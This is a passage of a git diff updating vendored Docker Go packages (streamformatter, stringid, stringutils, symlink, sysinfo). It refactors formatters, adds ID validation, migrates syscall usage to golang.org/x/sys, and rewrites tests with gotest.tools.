formatProgress interface { + formatStatus(id, format string, a ...interface{}) []byte + formatProgress(id, action string, progress *jsonmessage.JSONProgress, aux interface{}) []byte } type progressOutput struct { - sf *StreamFormatter + sf formatProgress out io.Writer newLines bool } @@ -123,10 +115,10 @@ type progressOutput struct { func (out *progressOutput) WriteProgress(prog progress.Progress) error { var formatted []byte if prog.Message != "" { - formatted = out.sf.FormatStatus(prog.ID, prog.Message) + formatted = out.sf.formatStatus(prog.ID, prog.Message) } else { - jsonProgress := jsonmessage.JSONProgress{Current: prog.Current, Total: prog.Total} - formatted = out.sf.FormatProgress(prog.ID, prog.Action, &jsonProgress, prog.Aux) + jsonProgress := jsonmessage.JSONProgress{Current: prog.Current, Total: prog.Total, HideCounts: prog.HideCounts, Units: prog.Units} + formatted = out.sf.formatProgress(prog.ID, prog.Action, &jsonProgress, prog.Aux) } _, err := out.out.Write(formatted) if err != nil { @@ -134,39 +126,34 @@ func (out *progressOutput) WriteProgress(prog progress.Progress) error { } if out.newLines && prog.LastUpdate { - _, err = out.out.Write(out.sf.FormatStatus("", "")) + _, err = out.out.Write(out.sf.formatStatus("", "")) return err } return nil } -// StdoutFormatter is a streamFormatter that writes to the standard output. -type StdoutFormatter struct { +// AuxFormatter is a streamFormatter that writes aux progress messages +type AuxFormatter struct { io.Writer - *StreamFormatter } -func (sf *StdoutFormatter) Write(buf []byte) (int, error) { - formattedBuf := sf.StreamFormatter.FormatStream(string(buf)) - n, err := sf.Writer.Write(formattedBuf) - if n != len(formattedBuf) { - return n, io.ErrShortWrite +// Emit emits the given interface as an aux progress message +func (sf *AuxFormatter) Emit(aux interface{}) error { + auxJSONBytes, err := json.Marshal(aux) + if err != nil { + return err } - return len(buf), err -} - -// StderrFormatter is a streamFormatter that writes to the standard error. -type StderrFormatter struct { - io.Writer - *StreamFormatter -} - -func (sf *StderrFormatter) Write(buf []byte) (int, error) { - formattedBuf := sf.StreamFormatter.FormatStream("\033[91m" + string(buf) + "\033[0m") - n, err := sf.Writer.Write(formattedBuf) - if n != len(formattedBuf) { - return n, io.ErrShortWrite + auxJSON := new(json.RawMessage) + *auxJSON = auxJSONBytes + msgJSON, err := json.Marshal(&jsonmessage.JSONMessage{Aux: auxJSON}) + if err != nil { + return err + } + msgJSON = appendNewline(msgJSON) + n, err := sf.Writer.Write(msgJSON) + if n != len(msgJSON) { + return io.ErrShortWrite } - return len(buf), err + return err } diff --git a/vendor/github.com/docker/docker/pkg/streamformatter/streamformatter_test.go b/vendor/github.com/docker/docker/pkg/streamformatter/streamformatter_test.go index 93ec90f5f7..4399a6509b 100644 --- a/vendor/github.com/docker/docker/pkg/streamformatter/streamformatter_test.go +++ b/vendor/github.com/docker/docker/pkg/streamformatter/streamformatter_test.go @@ -1,108 +1,112 @@ -package streamformatter +package streamformatter // import "github.com/docker/docker/pkg/streamformatter" import ( + "bytes" "encoding/json" "errors" - "reflect" "strings" "testing" "github.com/docker/docker/pkg/jsonmessage" + "github.com/google/go-cmp/cmp" + "github.com/google/go-cmp/cmp/cmpopts" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) -func TestFormatStream(t *testing.T) { - sf := NewStreamFormatter() - res := sf.FormatStream("stream") - if string(res) != "stream"+"\r" { - t.Fatalf("%q", res) - } -} - -func TestFormatJSONStatus(t *testing.T) { - sf := NewStreamFormatter() - res := sf.FormatStatus("ID", "%s%d", "a", 1) - if string(res) != "a1\r\n" { - t.Fatalf("%q", res) - } +func TestRawProgressFormatterFormatStatus(t *testing.T) { + sf := rawProgressFormatter{} + res := sf.formatStatus("ID", "%s%d", "a", 1) + assert.Check(t, is.Equal("a1\r\n", string(res))) } -func TestFormatSimpleError(t *testing.T) { - sf := NewStreamFormatter() - res := sf.FormatError(errors.New("Error for formatter")) - if string(res) != "Error: Error for formatter\r\n" { - t.Fatalf("%q", res) - } -} - -func TestJSONFormatStream(t *testing.T) { - sf := NewJSONStreamFormatter() - res := sf.FormatStream("stream") - if string(res) != `{"stream":"stream"}`+"\r\n" { - t.Fatalf("%q", res) +func TestRawProgressFormatterFormatProgress(t *testing.T) { + sf := rawProgressFormatter{} + jsonProgress := &jsonmessage.JSONProgress{ + Current: 15, + Total: 30, + Start: 1, } + res := sf.formatProgress("id", "action", jsonProgress, nil) + out := string(res) + assert.Check(t, strings.HasPrefix(out, "action [====")) + assert.Check(t, is.Contains(out, "15B/30B")) + assert.Check(t, strings.HasSuffix(out, "\r")) } -func TestJSONFormatStatus(t *testing.T) { - sf := NewJSONStreamFormatter() - res := sf.FormatStatus("ID", "%s%d", "a", 1) - if string(res) != `{"status":"a1","id":"ID"}`+"\r\n" { - t.Fatalf("%q", res) - } +func TestFormatStatus(t *testing.T) { + res := FormatStatus("ID", "%s%d", "a", 1) + expected := `{"status":"a1","id":"ID"}` + streamNewline + assert.Check(t, is.Equal(expected, string(res))) } -func TestJSONFormatSimpleError(t *testing.T) { - sf := NewJSONStreamFormatter() - res := sf.FormatError(errors.New("Error for formatter")) - if string(res) != `{"errorDetail":{"message":"Error for formatter"},"error":"Error for formatter"}`+"\r\n" { - t.Fatalf("%q", res) - } +func TestFormatError(t *testing.T) { + res := FormatError(errors.New("Error for formatter")) + expected := `{"errorDetail":{"message":"Error for formatter"},"error":"Error for formatter"}` + "\r\n" + assert.Check(t, is.Equal(expected, string(res))) } -func TestJSONFormatJSONError(t *testing.T) { - sf := NewJSONStreamFormatter() +func TestFormatJSONError(t *testing.T) { err := &jsonmessage.JSONError{Code: 50, Message: "Json error"} - res := sf.FormatError(err) - if string(res) != `{"errorDetail":{"code":50,"message":"Json error"},"error":"Json error"}`+"\r\n" { - t.Fatalf("%q", res) - } + res := FormatError(err) + expected := `{"errorDetail":{"code":50,"message":"Json error"},"error":"Json error"}` + streamNewline + assert.Check(t, is.Equal(expected, string(res))) } -func TestJSONFormatProgress(t *testing.T) { - sf := NewJSONStreamFormatter() - progress := &jsonmessage.JSONProgress{ +func TestJsonProgressFormatterFormatProgress(t *testing.T) { + sf := &jsonProgressFormatter{} + jsonProgress := &jsonmessage.JSONProgress{ Current: 15, Total: 30, Start: 1, } - res := sf.FormatProgress("id", "action", progress, nil) + aux := "aux message" + res := sf.formatProgress("id", "action", jsonProgress, aux) msg := &jsonmessage.JSONMessage{} - if err := json.Unmarshal(res, msg); err != nil { - t.Fatal(err) + + assert.NilError(t, json.Unmarshal(res, msg)) + + rawAux := json.RawMessage(`"` + aux + `"`) + expected := &jsonmessage.JSONMessage{ + ID: "id", + Status: "action", + Aux: &rawAux, + Progress: jsonProgress, } - if msg.ID != "id" { - t.Fatalf("ID must be 'id', got: %s", msg.ID) + assert.DeepEqual(t, msg, expected, cmpJSONMessageOpt()) +} + +func cmpJSONMessageOpt() cmp.Option { + progressMessagePath := func(path cmp.Path) bool { + return path.String() == "ProgressMessage" } - if msg.Status != "action" { - t.Fatalf("Status must be 'action', got: %s", msg.Status) + return cmp.Options{ + cmpopts.IgnoreUnexported(jsonmessage.JSONProgress{}), + // Ignore deprecated property that is a derivative of Progress + cmp.FilterPath(progressMessagePath, cmp.Ignore()), } +} - // The progress will always be in the format of: - // [=========================> ] 15 B/30 B 404933h7m11s - // The last entry '404933h7m11s' is the timeLeftBox. - // However, the timeLeftBox field may change as progress.String() depends on time.Now(). - // Therefore, we have to strip the timeLeftBox from the strings to do the comparison. +func TestJsonProgressFormatterFormatStatus(t *testing.T) { + sf := jsonProgressFormatter{} + res := sf.formatStatus("ID", "%s%d", "a", 1) + assert.Check(t, is.Equal(`{"status":"a1","id":"ID"}`+streamNewline, string(res))) +} - // Compare the progress strings before the timeLeftBox - expectedProgress := "[=========================> ] 15 B/30 B" - // if terminal column is <= 110, expectedProgressShort is expected. - expectedProgressShort := " 15 B/30 B" - if !(strings.HasPrefix(msg.ProgressMessage, expectedProgress) || - strings.HasPrefix(msg.ProgressMessage, expectedProgressShort)) { - t.Fatalf("ProgressMessage without the timeLeftBox must be %s or %s, got: %s", - expectedProgress, expectedProgressShort, msg.ProgressMessage) - } +func TestNewJSONProgressOutput(t *testing.T) { + b := bytes.Buffer{} + b.Write(FormatStatus("id", "Downloading")) + _ = NewJSONProgressOutput(&b, false) + assert.Check(t, is.Equal(`{"status":"Downloading","id":"id"}`+streamNewline, b.String())) +} - if !reflect.DeepEqual(msg.Progress, progress) { - t.Fatal("Original progress not equals progress from FormatProgress") - } +func TestAuxFormatterEmit(t *testing.T) { + b := bytes.Buffer{} + aux := &AuxFormatter{Writer: &b} + sampleAux := &struct { + Data string + }{"Additional data"} + err := aux.Emit(sampleAux) + assert.NilError(t, err) + assert.Check(t, is.Equal(`{"aux":{"Data":"Additional data"}}`+streamNewline, b.String())) } diff --git a/vendor/github.com/docker/docker/pkg/streamformatter/streamwriter.go b/vendor/github.com/docker/docker/pkg/streamformatter/streamwriter.go new file mode 100644 index 0000000000..1473ed974a --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/streamformatter/streamwriter.go @@ -0,0 +1,47 @@ +package streamformatter // import "github.com/docker/docker/pkg/streamformatter" + +import ( + "encoding/json" + "io" + + "github.com/docker/docker/pkg/jsonmessage" +) + +type streamWriter struct { + io.Writer + lineFormat func([]byte) string +} + +func (sw *streamWriter) Write(buf []byte) (int, error) { + formattedBuf := sw.format(buf) + n, err := sw.Writer.Write(formattedBuf) + if n != len(formattedBuf) { + return n, io.ErrShortWrite + } + return len(buf), err +} + +func (sw *streamWriter) format(buf []byte) []byte { + msg := &jsonmessage.JSONMessage{Stream: sw.lineFormat(buf)} + b, err := json.Marshal(msg) + if err != nil { + return FormatError(err) + } + return appendNewline(b) +} + +// NewStdoutWriter returns a writer which formats the output as json message +// representing stdout lines +func NewStdoutWriter(out io.Writer) io.Writer { + return &streamWriter{Writer: out, lineFormat: func(buf []byte) string { + return string(buf) + }} +} + +// NewStderrWriter returns a writer which formats the output as json message +// representing stderr lines +func NewStderrWriter(out io.Writer) io.Writer { + return &streamWriter{Writer: out, lineFormat: func(buf []byte) string { + return "\033[91m" + string(buf) + "\033[0m" + }} +} diff --git a/vendor/github.com/docker/docker/pkg/streamformatter/streamwriter_test.go b/vendor/github.com/docker/docker/pkg/streamformatter/streamwriter_test.go new file mode 100644 index 0000000000..5b679f2cf4 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/streamformatter/streamwriter_test.go @@ -0,0 +1,35 @@ +package streamformatter // import "github.com/docker/docker/pkg/streamformatter" + +import ( + "bytes" + "testing" + + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestStreamWriterStdout(t *testing.T) { + buffer := &bytes.Buffer{} + content := "content" + sw := NewStdoutWriter(buffer) + size, err := sw.Write([]byte(content)) + + assert.NilError(t, err) + assert.Check(t, is.Equal(len(content), size)) + + expected := `{"stream":"content"}` + streamNewline + assert.Check(t, is.Equal(expected, buffer.String())) +} + +func TestStreamWriterStderr(t *testing.T) { + buffer := &bytes.Buffer{} + content := "content" + sw := NewStderrWriter(buffer) + size, err := sw.Write([]byte(content)) + + assert.NilError(t, err) + assert.Check(t, is.Equal(len(content), size)) + + expected := `{"stream":"\u001b[91mcontent\u001b[0m"}` + streamNewline + assert.Check(t, is.Equal(expected, buffer.String())) +} diff --git a/vendor/github.com/docker/docker/pkg/stringid/stringid.go b/vendor/github.com/docker/docker/pkg/stringid/stringid.go index fa35d8bad5..fa7d9166eb 100644 --- a/vendor/github.com/docker/docker/pkg/stringid/stringid.go +++ b/vendor/github.com/docker/docker/pkg/stringid/stringid.go @@ -1,20 +1,26 @@ // Package stringid provides helper functions for dealing with string identifiers -package stringid +package stringid // import "github.com/docker/docker/pkg/stringid" import ( - "crypto/rand" + cryptorand "crypto/rand" "encoding/hex" + "fmt" "io" + "math" + "math/big" + "math/rand" "regexp" "strconv" "strings" - - "github.com/docker/docker/pkg/random" + "time" ) const shortLen = 12 -var validShortID = regexp.MustCompile("^[a-z0-9]{12}$") +var ( + validShortID = regexp.MustCompile("^[a-f0-9]{12}$") + validHex = regexp.MustCompile(`^[a-f0-9]{64}$`) +) // IsShortID determines if an arbitrary string *looks like* a short ID. func IsShortID(id string) bool { @@ -35,12 +41,8 @@ func TruncateID(id string) string { return id } -func generateID(crypto bool) string { +func generateID(r io.Reader) string { b := make([]byte, 32) - r := random.Reader - if crypto { - r = rand.Reader - } for { if _, err := io.ReadFull(r, b); err != nil { panic(err) // This shouldn't happen @@ -58,12 +60,40 @@ func generateID(crypto bool) string { // GenerateRandomID returns a unique id. func GenerateRandomID() string { - return generateID(true) + return generateID(cryptorand.Reader) } // GenerateNonCryptoID generates unique id without using cryptographically // secure sources of random. // It helps you to save entropy. func GenerateNonCryptoID() string { - return generateID(false) + return generateID(readerFunc(rand.Read)) +} + +// ValidateID checks whether an ID string is a valid image ID. +func ValidateID(id string) error { + if ok := validHex.MatchString(id); !ok { + return fmt.Errorf("image ID %q is invalid", id) + } + return nil +} + +func init() { + // safely set the seed globally so we generate random ids. Tries to use a + // crypto seed before falling back to time. + var seed int64 + if cryptoseed, err := cryptorand.Int(cryptorand.Reader, big.NewInt(math.MaxInt64)); err != nil { + // This should not happen, but worst-case fallback to time-based seed. + seed = time.Now().UnixNano() + } else { + seed = cryptoseed.Int64() + } + + rand.Seed(seed) +} + +type readerFunc func(p []byte) (int, error) + +func (fn readerFunc) Read(p []byte) (int, error) { + return fn(p) } diff --git a/vendor/github.com/docker/docker/pkg/stringid/stringid_test.go b/vendor/github.com/docker/docker/pkg/stringid/stringid_test.go index 8ff6b4383d..a7ccd5faae 100644 --- a/vendor/github.com/docker/docker/pkg/stringid/stringid_test.go +++ b/vendor/github.com/docker/docker/pkg/stringid/stringid_test.go @@ -1,4 +1,4 @@ -package stringid +package stringid // import "github.com/docker/docker/pkg/stringid" import ( "strings" diff --git a/vendor/github.com/docker/docker/pkg/stringutils/README.md b/vendor/github.com/docker/docker/pkg/stringutils/README.md deleted file mode 100644 index b3e454573c..0000000000 --- a/vendor/github.com/docker/docker/pkg/stringutils/README.md +++ /dev/null @@ -1 +0,0 @@ -This package provides helper functions for dealing with strings diff --git a/vendor/github.com/docker/docker/pkg/stringutils/stringutils.go b/vendor/github.com/docker/docker/pkg/stringutils/stringutils.go deleted file mode 100644 index 8e1c812d7a..0000000000 --- a/vendor/github.com/docker/docker/pkg/stringutils/stringutils.go +++ /dev/null @@ -1,101 +0,0 @@ -// Package stringutils provides helper functions for dealing with strings. -package stringutils - -import ( - "bytes" - "math/rand" - "strings" - - "github.com/docker/docker/pkg/random" -) - -// GenerateRandomAlphaOnlyString generates an alphabetical random string with length n. -func GenerateRandomAlphaOnlyString(n int) string { - // make a really long string - letters := []byte("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ") - b := make([]byte, n) - for i := range b { - b[i] = letters[random.Rand.Intn(len(letters))] - } - return string(b) -} - -// GenerateRandomASCIIString generates an ASCII random string with length n. -func GenerateRandomASCIIString(n int) string { - chars := "abcdefghijklmnopqrstuvwxyz" + - "ABCDEFGHIJKLMNOPQRSTUVWXYZ" + - "~!@#$%^&*()-_+={}[]\\|<,>.?/\"';:` " - res := make([]byte, n) - for i := 0; i < n; i++ { - res[i] = chars[rand.Intn(len(chars))] - } - return string(res) -} - -// Ellipsis truncates a string to fit within maxlen, and appends ellipsis (...). -// For maxlen of 3 and lower, no ellipsis is appended. -func Ellipsis(s string, maxlen int) string { - r := []rune(s) - if len(r) <= maxlen { - return s - } - if maxlen <= 3 { - return string(r[:maxlen]) - } - return string(r[:maxlen-3]) + "..." -} - -// Truncate truncates a string to maxlen. -func Truncate(s string, maxlen int) string { - r := []rune(s) - if len(r) <= maxlen { - return s - } - return string(r[:maxlen]) -} - -// InSlice tests whether a string is contained in a slice of strings or not. -// Comparison is case insensitive -func InSlice(slice []string, s string) bool { - for _, ss := range slice { - if strings.ToLower(s) == strings.ToLower(ss) { - return true - } - } - return false -} - -func quote(word string, buf *bytes.Buffer) { - // Bail out early for "simple" strings - if word != "" && !strings.ContainsAny(word, "\\'\"`${[|&;<>()~*?! \t\n") { - buf.WriteString(word) - return - } - - buf.WriteString("'") - - for i := 0; i < len(word); i++ { - b := word[i] - if b == '\'' { - // Replace literal ' with a close ', a \', and a open ' - buf.WriteString("'\\''") - } else { - buf.WriteByte(b) - } - } - - buf.WriteString("'") -} - -// ShellQuoteArguments takes a list of strings and escapes them so they will be -// handled right when passed as arguments to a program via a shell -func ShellQuoteArguments(args []string) string { - var buf bytes.Buffer - for i, arg := range args { - if i != 0 { - buf.WriteByte(' ') - } - quote(arg, &buf) - } - return buf.String() -} diff --git a/vendor/github.com/docker/docker/pkg/stringutils/stringutils_test.go b/vendor/github.com/docker/docker/pkg/stringutils/stringutils_test.go deleted file mode 100644 index 8af2bdcc0b..0000000000 --- a/vendor/github.com/docker/docker/pkg/stringutils/stringutils_test.go +++ /dev/null @@ -1,121 +0,0 @@ -package stringutils - -import "testing" - -func testLengthHelper(generator func(int) string, t *testing.T) { - expectedLength := 20 - s := generator(expectedLength) - if len(s) != expectedLength { - t.Fatalf("Length of %s was %d but expected length %d", s, len(s), expectedLength) - } -} - -func testUniquenessHelper(generator func(int) string, t *testing.T) { - repeats := 25 - set := make(map[string]struct{}, repeats) - for i := 0; i < repeats; i = i + 1 { - str := generator(64) - if len(str) != 64 { - t.Fatalf("Id returned is incorrect: %s", str) - } - if _, ok := set[str]; ok { - t.Fatalf("Random number is repeated") - } - set[str] = struct{}{} - } -} - -func isASCII(s string) bool { - for _, c := range s { - if c > 127 { - return false - } - } - return true -} - -func TestGenerateRandomAlphaOnlyStringLength(t *testing.T) { - testLengthHelper(GenerateRandomAlphaOnlyString, t) -} - -func TestGenerateRandomAlphaOnlyStringUniqueness(t *testing.T) { - testUniquenessHelper(GenerateRandomAlphaOnlyString, t) -} - -func TestGenerateRandomAsciiStringLength(t *testing.T) { - testLengthHelper(GenerateRandomASCIIString, t) -} - -func TestGenerateRandomAsciiStringUniqueness(t *testing.T) { - testUniquenessHelper(GenerateRandomASCIIString, t) -} - -func TestGenerateRandomAsciiStringIsAscii(t *testing.T) { - str := GenerateRandomASCIIString(64) - if !isASCII(str) { - t.Fatalf("%s contained non-ascii characters", str) - } -} - -func TestEllipsis(t *testing.T) { - str := "t🐳ststring" - newstr := Ellipsis(str, 3) - if newstr != "t🐳s" { - t.Fatalf("Expected t🐳s, got %s", newstr) - } - newstr = Ellipsis(str, 8) - if newstr != "t🐳sts..." { - t.Fatalf("Expected tests..., got %s", newstr) - } - newstr = Ellipsis(str, 20) - if newstr != "t🐳ststring" { - t.Fatalf("Expected t🐳ststring, got %s", newstr) - } -} - -func TestTruncate(t *testing.T) { - str := "t🐳ststring" - newstr := Truncate(str, 4) - if newstr != "t🐳st" { - t.Fatalf("Expected t🐳st, got %s", newstr) - } - newstr = Truncate(str, 20) - if newstr != "t🐳ststring" { - t.Fatalf("Expected t🐳ststring, got %s", newstr) - } -} - -func TestInSlice(t *testing.T) { - slice := []string{"t🐳st", "in", "slice"} - - test := InSlice(slice, "t🐳st") - if !test { - t.Fatalf("Expected string t🐳st to be in slice") - } - test = InSlice(slice, "SLICE") - if !test { - t.Fatalf("Expected string SLICE to be in slice") - } - test = InSlice(slice, "notinslice") - if test { - t.Fatalf("Expected string notinslice not to be in slice") - } -} - -func TestShellQuoteArgumentsEmpty(t *testing.T) { - actual := ShellQuoteArguments([]string{}) - expected := "" - if actual != expected { - t.Fatalf("Expected an empty string") - } -} - -func TestShellQuoteArguments(t *testing.T) { - simpleString := "simpleString" - complexString := "This is a 'more' complex $tring with some special char *" - actual := ShellQuoteArguments([]string{simpleString, complexString}) - expected := "simpleString 'This is a '\\''more'\\'' complex $tring with some special char *'" - if actual != expected { - t.Fatalf("Expected \"%v\", got \"%v\"", expected, actual) - } -} diff --git a/vendor/github.com/docker/docker/pkg/symlink/LICENSE.APACHE b/vendor/github.com/docker/docker/pkg/symlink/LICENSE.APACHE index 34c4ea7c50..b9fbf3c98f 100644 --- a/vendor/github.com/docker/docker/pkg/symlink/LICENSE.APACHE +++ b/vendor/github.com/docker/docker/pkg/symlink/LICENSE.APACHE @@ -176,7 +176,7 @@ END OF TERMS AND CONDITIONS - Copyright 2014-2016 Docker, Inc. + Copyright 2014-2017 Docker, Inc. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. diff --git a/vendor/github.com/docker/docker/pkg/symlink/LICENSE.BSD b/vendor/github.com/docker/docker/pkg/symlink/LICENSE.BSD index 9b4f4a294e..4c056c5ed2 100644 --- a/vendor/github.com/docker/docker/pkg/symlink/LICENSE.BSD +++ b/vendor/github.com/docker/docker/pkg/symlink/LICENSE.BSD @@ -1,4 +1,4 @@ -Copyright (c) 2014-2016 The Docker & Go Authors. All rights reserved. +Copyright (c) 2014-2017 The Docker & Go Authors. All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are diff --git a/vendor/github.com/docker/docker/pkg/symlink/fs.go b/vendor/github.com/docker/docker/pkg/symlink/fs.go index f6bc2231f6..7b894cde73 100644 --- a/vendor/github.com/docker/docker/pkg/symlink/fs.go +++ b/vendor/github.com/docker/docker/pkg/symlink/fs.go @@ -4,7 +4,7 @@ // This code is a modified version of path/filepath/symlink.go from the Go standard library. -package symlink +package symlink // import "github.com/docker/docker/pkg/symlink" import ( "bytes" @@ -40,7 +40,7 @@ func FollowSymlinkInScope(path, root string) (string, error) { // // Example: // If /foo/bar -> /outside, -// FollowSymlinkInScope("/foo/bar", "/foo") == "/foo/outside" instead of "/oustide" +// FollowSymlinkInScope("/foo/bar", "/foo") == "/foo/outside" instead of "/outside" // // IMPORTANT: it is the caller's responsibility to call evalSymlinksInScope *after* relevant symlinks // are created and not to create subsequently, additional symlinks that could potentially make a diff --git a/vendor/github.com/docker/docker/pkg/symlink/fs_unix.go b/vendor/github.com/docker/docker/pkg/symlink/fs_unix.go index 22708273d6..c6dafcb0b9 100644 --- a/vendor/github.com/docker/docker/pkg/symlink/fs_unix.go +++ b/vendor/github.com/docker/docker/pkg/symlink/fs_unix.go @@ -1,6 +1,6 @@ // +build !windows -package symlink +package symlink // import "github.com/docker/docker/pkg/symlink" import ( "path/filepath" diff --git a/vendor/github.com/docker/docker/pkg/symlink/fs_unix_test.go b/vendor/github.com/docker/docker/pkg/symlink/fs_unix_test.go index 7085c0b666..9ed1dd70db 100644 --- a/vendor/github.com/docker/docker/pkg/symlink/fs_unix_test.go +++ b/vendor/github.com/docker/docker/pkg/symlink/fs_unix_test.go @@ -2,7 +2,7 @@ // Licensed under the Apache License, Version 2.0; See LICENSE.APACHE -package symlink +package symlink // import "github.com/docker/docker/pkg/symlink" import ( "fmt" diff --git a/vendor/github.com/docker/docker/pkg/symlink/fs_windows.go b/vendor/github.com/docker/docker/pkg/symlink/fs_windows.go index 241e531f9d..754761717b 100644 --- a/vendor/github.com/docker/docker/pkg/symlink/fs_windows.go +++ b/vendor/github.com/docker/docker/pkg/symlink/fs_windows.go @@ -1,4 +1,4 @@ -package symlink +package symlink // import "github.com/docker/docker/pkg/symlink" import ( "bytes" @@ -6,49 +6,49 @@ import ( "os" "path/filepath" "strings" - "syscall" "github.com/docker/docker/pkg/longpath" + "golang.org/x/sys/windows" ) func toShort(path string) (string, error) { - p, err := syscall.UTF16FromString(path) + p, err := windows.UTF16FromString(path) if err != nil { return "", err } b := p // GetShortPathName says we can reuse buffer - n, err := syscall.GetShortPathName(&p[0], &b[0], uint32(len(b))) + n, err := windows.GetShortPathName(&p[0], &b[0], uint32(len(b))) if err != nil { return "", err } if n > uint32(len(b)) { b = make([]uint16, n) - if _, err = syscall.GetShortPathName(&p[0], &b[0], uint32(len(b))); err != nil { + if _, err = windows.GetShortPathName(&p[0], &b[0], uint32(len(b))); err != nil { return "", err } } - return syscall.UTF16ToString(b), nil + return windows.UTF16ToString(b), nil } func toLong(path string) (string, error) { - p, err := syscall.UTF16FromString(path) + p, err := windows.UTF16FromString(path) if err != nil { return "", err } b := p // GetLongPathName says we can reuse buffer - n, err := syscall.GetLongPathName(&p[0], &b[0], uint32(len(b))) + n, err := windows.GetLongPathName(&p[0], &b[0], uint32(len(b))) if err != nil { return "", err } if n > uint32(len(b)) { b = make([]uint16, n) - n, err = syscall.GetLongPathName(&p[0], &b[0], uint32(len(b))) + n, err = windows.GetLongPathName(&p[0], &b[0], uint32(len(b))) if err != nil { return "", err } } b = b[:n] - return syscall.UTF16ToString(b), nil + return windows.UTF16ToString(b), nil } func evalSymlinks(path string) (string, error) { @@ -65,7 +65,7 @@ func evalSymlinks(path string) (string, error) { if err != nil { return "", err } - // syscall.GetLongPathName does not change the case of the drive letter, + // windows.GetLongPathName does not change the case of the drive letter, // but the result of EvalSymlinks must be unique, so we have // EvalSymlinks(`c:\a`) == EvalSymlinks(`C:\a`). // Make drive letter upper case. diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/numcpu.go b/vendor/github.com/docker/docker/pkg/sysinfo/numcpu.go index aeb1a3a804..eea2d25bf9 100644 --- a/vendor/github.com/docker/docker/pkg/sysinfo/numcpu.go +++ b/vendor/github.com/docker/docker/pkg/sysinfo/numcpu.go @@ -1,6 +1,6 @@ // +build !linux,!windows -package sysinfo +package sysinfo // import "github.com/docker/docker/pkg/sysinfo" import ( "runtime" diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/numcpu_linux.go b/vendor/github.com/docker/docker/pkg/sysinfo/numcpu_linux.go index 5eacd35121..5f6c6df8c4 100644 --- a/vendor/github.com/docker/docker/pkg/sysinfo/numcpu_linux.go +++ b/vendor/github.com/docker/docker/pkg/sysinfo/numcpu_linux.go @@ -1,11 +1,10 @@ -// +build linux - -package sysinfo +package sysinfo // import "github.com/docker/docker/pkg/sysinfo" import ( "runtime" - "syscall" "unsafe" + + "golang.org/x/sys/unix" ) // numCPU queries the system for the count of threads available @@ -15,10 +14,10 @@ import ( // Returns 0 on errors. Use |runtime.NumCPU| in that case. func numCPU() int { // Gets the affinity mask for a process: The very one invoking this function. - pid, _, _ := syscall.RawSyscall(syscall.SYS_GETPID, 0, 0, 0) + pid, _, _ := unix.RawSyscall(unix.SYS_GETPID, 0, 0, 0) var mask [1024 / 64]uintptr - _, _, err := syscall.RawSyscall(syscall.SYS_SCHED_GETAFFINITY, pid, uintptr(len(mask)*8), uintptr(unsafe.Pointer(&mask[0]))) + _, _, err := unix.RawSyscall(unix.SYS_SCHED_GETAFFINITY, pid, uintptr(len(mask)*8), uintptr(unsafe.Pointer(&mask[0]))) if err != 0 { return 0 } diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/numcpu_windows.go b/vendor/github.com/docker/docker/pkg/sysinfo/numcpu_windows.go index 1d89dd5503..13523f671f 100644 --- a/vendor/github.com/docker/docker/pkg/sysinfo/numcpu_windows.go +++ b/vendor/github.com/docker/docker/pkg/sysinfo/numcpu_windows.go @@ -1,6 +1,4 @@ -// +build windows - -package sysinfo +package sysinfo // import "github.com/docker/docker/pkg/sysinfo" import ( "runtime" diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo.go b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo.go index f046de4b16..8fc0ecc25e 100644 --- a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo.go +++ b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo.go @@ -1,4 +1,4 @@ -package sysinfo +package sysinfo // import "github.com/docker/docker/pkg/sysinfo" import "github.com/docker/docker/pkg/parsers" diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_linux.go b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_linux.go index 7ad84a8309..dde5be19bc 100644 --- a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_linux.go +++ b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_linux.go @@ -1,4 +1,4 @@ -package sysinfo +package sysinfo // import "github.com/docker/docker/pkg/sysinfo" import ( "fmt" @@ -6,15 +6,10 @@ import ( "os" "path" "strings" - "syscall" - "github.com/Sirupsen/logrus" "github.com/opencontainers/runc/libcontainer/cgroups" -) - -const ( - // SeccompModeFilter refers to the syscall argument SECCOMP_MODE_FILTER. - SeccompModeFilter = uintptr(2) + "github.com/sirupsen/logrus" + "golang.org/x/sys/unix" ) func findCgroupMountpoints() (map[string]string, error) { @@ -60,9 +55,9 @@ func New(quiet bool) *SysInfo { } // Check if Seccomp is supported, via CONFIG_SECCOMP. - if _, _, err := syscall.RawSyscall(syscall.SYS_PRCTL, syscall.PR_GET_SECCOMP, 0, 0); err != syscall.EINVAL { + if err := unix.Prctl(unix.PR_GET_SECCOMP, 0, 0, 0, 0); err != unix.EINVAL { // Make sure the kernel has CONFIG_SECCOMP_FILTER. - if _, _, err := syscall.RawSyscall(syscall.SYS_PRCTL, syscall.PR_SET_SECCOMP, SeccompModeFilter, 0); err != syscall.EINVAL { + if err := unix.Prctl(unix.PR_SET_SECCOMP, unix.SECCOMP_MODE_FILTER, 0, 0, 0); err != unix.EINVAL { sysInfo.Seccomp = true } } diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_linux_test.go b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_linux_test.go index fae0fdffbb..13a07fbce9 100644 --- a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_linux_test.go +++ b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_linux_test.go @@ -1,4 +1,4 @@ -package sysinfo +package sysinfo // import "github.com/docker/docker/pkg/sysinfo" import ( "io/ioutil" @@ -6,29 +6,29 @@ import ( "path" "path/filepath" "testing" + + "golang.org/x/sys/unix" + "gotest.tools/assert" ) func TestReadProcBool(t *testing.T) { tmpDir, err := ioutil.TempDir("", 